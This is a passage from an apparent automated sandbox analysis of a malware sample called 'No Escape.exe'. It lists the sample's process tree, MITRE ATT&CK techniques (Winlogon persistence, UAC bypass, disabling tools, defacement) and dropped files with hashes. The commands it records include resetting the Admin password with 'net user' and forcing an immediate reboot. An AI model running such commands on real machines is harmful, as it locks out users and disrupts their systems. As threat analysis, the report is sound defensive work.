        Modifies registry key
        
        PID:2780
    - - C:\Windows\system32\net.exe
        
        net user Admin death
        5⤵
        
        PID:1384
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin death
        6⤵
        
        PID:3696
    - - C:\Windows\system32\shutdown.exe
        
        shutdown /t 0 /r
        5⤵
        
        PID:4964

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5092

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39be055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\date.txt

Filesize
120B

MD5
255a8e245b6ad378558b90cbe3dbc3d0

SHA1
6eb73f9f2034c113a2a6b1aab9a440a21928cfc2

SHA256
d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9

SHA512
67e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf

Download Submit
C:\Program Files (x86)\hello.bat

Filesize
1KB

MD5
b86fddd2b764f079615be5d4dc3e158d

SHA1
2510479054db1fe52cc2dcd3c7033d91204cb367

SHA256
2b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091

SHA512
915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63

Download Submit
C:\Program Files (x86)\hello.jpg

Filesize
110KB

MD5
057ea45c364eb2994808a47b118556a2

SHA1
1d48c9c15ea5548af1475b5a369a4f7b8db42858

SHA256
6e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836

SHA512
582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760

Download Submit
C:\Program Files (x86)\hello.reg

Filesize
3KB

MD5
81427e9d5d10657b9edffd22e7b405bb

SHA1
f27ab62f77f827dbb32c66a35ac48006c47f4374

SHA256
bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83

SHA512
b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592

Download Submit
C:\Program Files (x86)\launch.exe

Filesize
92KB

MD5
b4acc41d0e55b299ffeec11a8a20cf08

SHA1
bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa

SHA256
34bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42

SHA512
d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794

Download Submit
C:\Program Files (x86)\msg.exe

Filesize
9KB

MD5
331a0667b11e02330357565427dc1175

SHA1
d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2

SHA256
fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431

SHA512
1c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\48f8953e-3f86-48f9-84b5-8e2101851497.tmp

Filesize
210KB

MD5
1796227dc6e7dcd58efe1fce115d90c6

SHA1
5d112f0dae71c8d130c2c4fe8b7e6e26a26846be

SHA256
ca5d79d4560e307da9966439b431bddfb0dd3807c50bb85e39f00b54a55a04aa

SHA512
61d0de9fad0340bddc89e467380bbb94c00af7952760b3eab32d085f0322c684914d2da34da3fa3ded7f687356bef50ba28126a6bfabac7ad03602af0792b1d8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
d21b1205febc2ab453ac037f433db17e

SHA1
ddbf61028fc7c0f94258831300581b6b1b66dcf3

SHA256
dc46d9fea6f95d5ea20d93d26c6281781a67ad7f00d0ff356f53bd84cda1952b

SHA512
f0c1ee6e50e5fd06f78cd80422ac55a2482d0cb88f1cbbda5a84820dc95391046f8a760d6d53c0c6513eec24f70a63f5b1a13027c91b84dd67cc862fbbfa640b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000004

Filesize
213KB

MD5
f942900ff0a10f251d338c612c456948

SHA1
4a283d3c8f3dc491e43c430d97c3489ee7a3d320

SHA256
38b76a54655aff71271a9ad376ac17f20187abd581bf5aced69ccde0fe6e2fd6

SHA512
9b393ce73598ed1997d28ceeddb23491a4d986c337984878ebb0ae06019e30ea77448d375d3d6563c774856d6bc98ee3ca0e0ba88ea5769a451a5e814f6ddb41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
07a906989590d1bee07b96b24b3a58e0

SHA1
bb2b751c3a991f6eb1aa87c8eefe4bc9c28c6ebd

SHA256
6f395544e9b38cf1d609bab0f0c569cc179b68f9771c9ff3fdbc313e02155bd3

SHA512
89695ce6ba7e49e5e8f06f491511b670deafb039b00aade3589ccb8b14e65d88130c82ccebcdb9040501e7d5036dac420323c777b3d0f86486be46afe651482f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
a484762d7cd064d5182731cc7b5c8278

SHA1
f6996b6844e68cb79b9f01d7d61806bf85d81204

SHA256
fac038df5f9fb244a3415bd7f0174ce7625716dc43dc3dde03d3187bfb6a0076

SHA512
56cfafb45c9de52a2e887926a0c8615e1b88adf255777f7fa7f5e7675f8620c5ef76fce3045a3da3863fd86fad261bb954314987f910d9b69a0cbbae65393292

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
2d32b7a13a982d64c2bd7a3044722f66

SHA1
3a52cbe232142656643725bac444a321cf8fb344

SHA256
1695fbeb9d207ba6125f04d7e8fabad47e15e8f5eb267c3ecc81ac430ee985fe

SHA512
0581c3635d862e63e63c567ac53e6047cfefc13a8c59602444a39d90b1ed20aabb1c618c1be0d12de4361a65e4dd25c31f0cedd455c53db85ece559e75a002f3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
9cba1b54c8b370551c17465ced10e7a2

SHA1
2c1634fcf63b070d0860c301e256095a6153a5d5

SHA256
a99d5f28fb2cefb89b4c95ead1a53d07a5bef30f8dbd53bf3cb875a0ff4d4b34

SHA512
6cb8538c59eaad9c2fbd76eccd5e8a0f49daf2090e4abe3db05ea5990df88b2f46262398472719e128524727e4981513e4d250c11ac7f5f745d03407acc4c9c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
04d152f11e6e7dda3b210d30a1238a33

SHA1
ded2080cdf3c9d4039aa206fa7adc153a2928ae6

SHA256
2e849705151621b3df4bed2f0a12ab9ef3fbfaa5f4c2d8b8c64689433730ba03

SHA512
3c0243dcaa308516e1d30efc45ac16b67ec81ee9b53848686aa7cf55971501f2d41b7888b89949eaf992391deab64bac8261c02b749fe465e9d5123fb0d9b8c1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
d5ba5c07eee81510c19779916807217b

SHA1
004111a7994698d9ba180f307d57581f19197c7e

SHA256
063535f203cd4990699de506e68994a2708251f78d2a886826abc7229860089b

SHA512
596357b1aa00aea32167e7f680212198b01f385024915da2ca4f5ce2d9708f743fadeaeb9923b9bf9fadc070104f3ea1e7182fbcfb4998ab4627a1fdd7bf7c92

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
60de551d389994aae8f45f6f8325cc6a

SHA1
2fc6098b8d94982a88990888368e34cf4528f9ae

SHA256
3a18916913d89d90b3039f273b9345a51b805f397bdb40bcf914721dda7f5d75

SHA512
8a734106256b9204ab61a32df711ef913cbe99ebdd136119f9ad04a3206935da22ab4d56e220add14b52c20c8bde064e81097f27c8d00bef5cad3bfddc4740e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
58a2993c1f1e5e0d76f5eb98fa94eb00

SHA1
903f6585f793b732dc50a09977baeef6041e3ca6

SHA256
231f3a429d2b5fa1b8d9e90859756df2489ae91d30262a1878a37a98493c5f84

SHA512
48c531a3d8f82f2e8d6eec9b578a0ff82c0a26a221b043d5ff42f805f71fb44466ea1c6b695e54801d6b594d8f0bdbd7062ddd942f7f5c146b9a5ca2536043e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7201d63a7dc36cfd52918cae4d6e42b9

SHA1
a42a14389f16fa231da3b8e65bd3112445f40968

SHA256
41e97de4220d95ed11e4581da7d713c8bacec63eee7e09755feb5cea8859efb7

SHA512
3bb5c0fff130ca8912b4c111ae79895bd3f8af98904092cc5e19821f444937e978c2d95a8e2246cf081f17d55d500b01cad0bb03d6f6a13a47fa6e01170df800

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
45220ffd7b67d7c7baca7d0e698ba72e

SHA1
19ad7fd0e80105fa490c82a08ce7649b54aacbb8

SHA256
6771dcb68602753037390d125dec413c09d54353d65e46f6a4f0e6a12cd24b1c

SHA512
fb8f9a1cc74f6468845115d5d9deea0f4b415194fa55e12cb9540956114ec811dd95728b1fe7b7d1b9ffe2cf94f33c463fb073ee41e0fa1e111749b944ef369a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
820d7188d2d493bdf15157bc0fe91170

SHA1
0c6f46d4bb5aa0b8d99bcdb9090e004cda4e1269

SHA256
6e3c53e5741bcc989af04953f22c7db6acd1ce51f85f7776124d8bed71d2d83e

SHA512
968bc4ce3144374fff33e79af4fd1dfaac358941e7db7de739e0b2f102ccdbff26981eb67c5eb51dc7de9a4bd8a1aa5af48be1936661e07e8404ab2f7c7667bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
210KB

MD5
3ba859b8904d86f6d39db2e1205a1f5c

SHA1
3657532d2b10b7d567bfa7f5718e0e3eeb4e6aa4

SHA256
a50b27b25858b22e4cf2766a66cd5584b62de19a05cbbe2ce323e795ee93b8f5

SHA512
347cc4e33f2626877c84149a0ea0354608830113f12c13c4bdbf4ad918ff5b912c68d28e6161708a350d9bc2b1545b864bdea85648dde62b7ea8496cf8683bc4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
210KB

MD5
3a22c154c07ee7d5849246f03ad5e045

SHA1
5c4195f2b83b95e57613cf5a8905d6dcbfbe988d

SHA256
e974dc4d210e450934214fa9f2e0776203aadd301de32d263bf991bc18787bc7

SHA512
165a74c698b479fc944bd3e3dbd7eafba3de8206541ad6e4df2c3971d7920b9e0fdbaea11c0a4bc0670bd7cf04975bcc1e6cdc6bb5be22dcd9e030b07622078d

Download Submit
C:\Users\Admin\AppData\Local\Temp\D136.tmp\D137.tmp\D138.vbs

Filesize
588B

MD5
67706bca9ceaba11530e05d351487003

SHA1
3a5ed77f81b14093a5f18c4d46895bc7ea770fee

SHA256
190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f

SHA512
902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598

Download Submit
C:\Users\Admin\Downloads\No Escape.exe

Filesize
771KB

MD5
2782877418b44509fd306fd9afe43e39

SHA1
b0c18bdf782ca9c4fa41074f05458ce8e0f3961b

SHA256
56d612e014504c96bb92429c31eb93f40938015d422b35765912ac4e6bd3755b

SHA512
8826881b3ab406ee4c1fabd4848161f8524aeaeb7c4397384d36840f947ef95c8560850b2409fbf761ff225cdc8ac6eb875b705476fe9574b23c7a5478505a86

Download Submit

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads